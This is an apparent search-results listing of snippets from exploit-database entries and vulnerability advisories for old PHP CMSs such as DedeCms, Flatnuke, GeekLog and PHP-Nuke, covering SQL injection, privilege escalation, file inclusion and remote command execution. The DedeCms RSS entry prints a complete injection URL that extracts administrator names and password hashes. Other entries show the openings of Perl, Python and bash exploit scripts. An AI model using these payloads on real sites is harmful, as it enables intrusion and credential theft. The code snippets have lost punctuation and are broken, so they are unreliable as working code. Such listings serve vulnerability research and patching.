30 matches found
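74cms 20150817: design flaw leads to injection in 8 different files (gpc=off)
Brief description: Dumps data directly. Details: http://download.74cms.com/download/74cmsv3.6beta20150817.zip is the download link. The global file of 74cms is include/common.inc.php, which contains: if !empty$GET $GET = help::addslashesdeep$GET; if !empty$POST $POST = help::addslashesdeep$POST; $COOKIE = help::addslashesdeep$COOKIE; $REQUEST =...
TinyShop SQL injection (GPC enabled, filter bypass)
Brief description: The earlier ones came from finding programmer oversights; this one bypasses the program's anti-injection protection. Details: Environment: GPC = On public static function sql$str //filter function if !getmagicquotesgpc //escape when gpc is off; this patched that odd earlier vulnerability //not used, mainly because a mysql connection must exist first //$str = mysqlrealescapestring$str; $str = addslashes$str; $str =...
qibocms: SQL injection in multiple systems from the same cause
Brief description: Because qibocms has many systems. I looked at the hole posted yesterday, then today downloaded several other qibo systems and found that some of them have this hole. Given that when qibocms patched before, it always patched a few systems and missed several others, I am writing out every system that has this hole, one by one. Details: First, look at the global file: $POST=AddS$POST; $GET=AddS$GET; $COOKIE=AddS$COOKIE; function AddS$array foreach$array as $key=$value if!isarray$value $value=strreplace"&x","& x",$value;...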
GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)
No description provided by source. !/usr/bin/perl -w use IO::Socket; print \r\n; print | Geeklog 1. remote commands execution |\r\n; print | By rgod rgodATautisticiDOTorg |\r\n; print | site: http://retrogod.altervista.org |\r\n; print | |\r\n; print \r\n; print | - this works against...
Flatnuke <= 2.7.1 (level) Remote Privilege Escalation Exploit
No description provided by source. !/usr/bin/env perl Flatnuke = 2.7.1 level Privilege Escalation 0-day Exploit Description ----------- Flatnuke contains one flaw that may allow a user to become administrator. The issue is due to 'sections/noneLogin/section.php' script not properly sanitizing use...
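DedeCms content management system: novel module insert injection vulnerability
DedeCms is a free PHP website content management system. DedeCms is known for being simple, practical and open source; it is the best-known open-source PHP website management system in China and the PHP CMS with the most users. With gpc=off, there is an insert injection vulnerability when adding a chapter in the novel module. 0 Dedecms Vendor patch: dedecms ------- The vendor has not yet provided a patch or upgrade; we recommend that users of this software watch the vendor's homepage for the latest version: http://www.dedecms.com/products/dedecms/...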
Santilga CMS 1.2.6.3 Cross Site Request Forgery / SQL Injection
============================= Vulnerable software: Santilga CMS version 1.2.6.3 $ head -n 10 Admin.php|less view-templateName = "admin"; parent::construct; $this-lang = SantilgaLanguage::getInstance-getLanguage; $this-view-lang = $this-lang; $this-view-showUploadForm = false; public function...
Santilga CMS 1.2.6.3 Cross Site Request Forgery / SQL Injection
Exploit for php platform in category web applications ============================= Vulnerable software: Santilga CMS version 1.2.6.3 $ head -n 10 Admin.php|less view-templateName = "admin"; parent::construct; $this-lang = SantilgaLanguage::getInstance-getLanguage; $this-view-lang = $this-lang;...
MyHobbySite 1.01 - SQL Injection Authentication Bypass
MyHobbySite 1.01 - SQL Injection Authentication Bypass Exploit Title: MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability Date: 12-09-2010 Author: YuGj VN Email: [email protected] Software Link: http://www.myhobbysite.net/index.php?page=15 Version: v1.01 Bug Code: if...
dedecms 5.6 RSS subscription page injection vulnerability-vulnerability warning-the black bar safety net
EXP: the uploads/plus/rss. php? tid=1&Cs1=1&Cs2%2 9% 2 9%20AND%2 0% 2 2% 2 7% 2 2%20AND%20updatexml%2 8 1,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,1 6% 2 9,0x5d%2 9%20FROM%20dedeadmin%29,1%2 9%2 3%2 70=1 The use of the environment: GPC off There updatexml function...
PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode)
PHP-Nuke new; my $average = 0; print "+ Calculating average load time may take a while ...\n"; for my $i = 0; $i get$hosto; my $time = time; $average += int$time-$bef; return $average/5; sub Nuke::Usage print "+ Usage: perl nuke.pl \n"; print "+ the host must be the complete path to modules.php\n...
ArabPortal 2.2.x SQL Injection
Exploit Title: ArabPortal V2.2.x Remote SQL Injection Vulnerability Author: SwEET-DeViL Published: 10-6-2010 Software Link: http://www.arab-portal.info/download.php?action=download&fileid=127 Version: 2.2.x Tested on: Linux Need : Magic Quotes Gpc = Off | |...
MoME CMS 0.8.5 - Remote Authentication Bypass
'/ -.- --------------------oOO------OOo------------------- | MoME CMS ! Download: http://sourceforge.net/projects/mome/files/ ! Date: 16.01.2010 ! Remote: yes ! Code : //controllo user e passwd da login ifisset$POST'postedusername' && isset$POST'postedpassword' $query="SELECT FROM users WHERE...
DasForum Local File Inclusion
'/ -.- --------------------oOO------OOo------------------- | DasForum layout Local File Inclusion Exploit | | works only with magicquotesgpc = off | ------------------------------------------------------ ! Discovered: cr4wl3r ! Download: http://mirror.vocabbuilder.net/savannah/dasforum/ ! Date:...
cP Creator 2.7.1 - SQL Injection
cP Creator 2.7.1 - SQL Injection !/usr/bin/python cP Creator v2.7.1 Remote Sql Injection AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : http://IrCrash.com - Coming Soon Again My Official WebSite : http://R3dW0rm.ir IRCRASH Team Members : Khashayar Fereidani ...
Gazelle CMS 1.0 Multiple Vulnerabilities / RCE Exploit
No description provided by source. !/bin/bash Gazelle CMS 1.0 Multiple Vulnerabilities Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download Found by whitesheep on 11/08/2009 Contact: [email protected] - https://www.ihteam.net Need magicquotegpc Off for RCE and LFI...
Irokez CMS 0.7.1 Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications =================================================== Irokez CMS 0.7.1 Remote SQL Injection Vulnerability ===================================================...
Flatnuke <= 2.7.1 (level) Remote Privilege Escalation Exploit
Exploit for unknown platform in category web applications ============================================================= Flatnuke timeout5; $lwp-agent'Links 2.1pre26; Linux 2.6.19-gentoo-r5 x8664; x'; $lwp-defaultheader'Cookie' = "myforum=$user; path=$path; secid=$secid; path=$path;"; $ret =...
Flatnuke 2.7.1 - level Privilege Escalation
Flatnuke 2.7.1 - level Privilege Escalation !/usr/bin/env perl Flatnuke timeout5; $lwp-agent'Links 2.1pre26; Linux 2.6.19-gentoo-r5 x8664; x'; $lwp-defaultheader'Cookie' = "myforum=$user; path=$path; secid=$secid; path=$path;"; $ret = $lwp-post"http://$h...
fuzzylime cms 3.01 Remote Command Execution Exploit
Exploit for unknown platform in category web applications =================================================== fuzzylime cms 3.01 Remote Command Execution Exploit =================================================== !/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams DESCRIPTION...